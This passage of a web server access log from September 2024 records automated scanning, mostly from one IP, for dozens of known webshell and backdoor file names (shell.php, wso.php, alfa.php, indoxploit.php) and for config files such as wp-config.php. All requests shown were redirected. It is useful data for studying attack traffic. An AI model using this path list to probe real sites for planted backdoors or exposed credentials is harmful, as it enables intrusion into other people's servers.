(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:48 +0700] "GET /lock360.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:50 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 104.248.174.117 - - [09/Sep/2024:21:16:52 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 51.15.16.101 - - [10/Sep/2024:14:00:23 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.172.87.144 - - [10/Sep/2024:20:14:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 87.236.176.42 - - [10/Sep/2024:22:57:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 104.248.174.117 - - [12/Sep/2024:04:09:54 +0700] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:09:55 +0700] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:00 +0700] "GET /defaults.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:04 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:07 +0700] "GET /wp-admin/user/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:12 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:16 +0700] "GET /wp-includes/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:20 +0700] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:22 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:24 +0700] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:26 +0700] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:27 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:29 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:30 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:32 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:36 +0700] "GET /db.php?u HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:39 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:42 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:46 +0700] "GET /Byp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:48 +0700] "GET /mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:54 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:56 +0700] "GET /shell20211028.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:10:58 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:00 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:03 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:05 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:06 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:12 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:13 +0700] "GET /wp-files.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:15 +0700] "GET /g3l4y.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:17 +0700] "GET /up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:22 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:24 +0700] "GET /chosen.php?p= HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:25 +0700] "GET /1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:29 +0700] "GET /123.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:32 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:35 +0700] "GET /wp-blog.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:38 +0700] "GET /wp-edit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:39 +0700] "GET /wp-config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:40 +0700] "GET /cok.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:42 +0700] "GET /config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:46 +0700] "GET /phpinfo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:48 +0700] "GET /idk.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:49 +0700] "GET /root.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:51 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:53 +0700] "GET /alpa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:55 +0700] "GET /alfa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:57 +0700] "GET /alfax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:11:59 +0700] "GET /memek.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:01 +0700] "GET /kontol.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:02 +0700] "GET /indoxploit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:03 +0700] "GET /clen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:05 +0700] "GET /core.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:07 +0700] "GET /caches.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:10 +0700] "GET /creates.php/fr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:13 +0700] "GET /index404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:15 +0700] "GET /indexof.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:17 +0700] "GET /stats.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:18 +0700] "GET /gec212.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:22 +0700] "GET /azdare.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:23 +0700] "GET /laymu.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:25 +0700] "GET /macibay.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:27 +0700] "GET /fdgfdgdsfd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:30 +0700] "GET /wp-update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:32 +0700] "GET /legal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:34 +0700] "GET /yuuki2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:35 +0700] "GET /rootshell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:37 +0700] "GET /rexx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:40 +0700] "GET /adminer.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:42 +0700] "GET /tes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:45 +0700] "GET /twin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:47 +0700] "GET /wp-admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:48 +0700] "GET /a.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:50 +0700] "GET /b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:52 +0700] "GET /c.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:55 +0700] "GET /d.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:12:58 +0700] "GET /e.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:02 +0700] "GET /f.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:04 +0700] "GET /g.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:06 +0700] "GET /h.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:08 +0700] "GET /i.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:10 +0700] "GET /j.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:13 +0700] "GET /k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:16 +0700] "GET /l.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:17 +0700] "GET /m.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:20 +0700] "GET /n.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:23 +0700] "GET /o.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:25 +0700] "GET /p.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:27 +0700] "GET /q.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:29 +0700] "GET /r.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:31 +0700] "GET /s.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:33 +0700] "GET /t.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:34 +0700] "GET /u.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:36 +0700] "GET /v.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:38 +0700] "GET /w.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:42 +0700] "GET /x.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:44 +0700] "GET /y.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:50 +0700] "GET /z.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:52 +0700] "GET /wp-rss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:56 +0700] "GET /wp-plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:57 +0700] "GET /wp-system.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:13:58 +0700] "GET /wp-site.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:01 +0700] "GET /wp-title.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:05 +0700] "GET /wp-we.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:08 +0700] "GET /wpindex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:10 +0700] "GET /wso1337.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:14:11 +0700] "GET /rad.php HTTP/1.1" 301 162 "-" 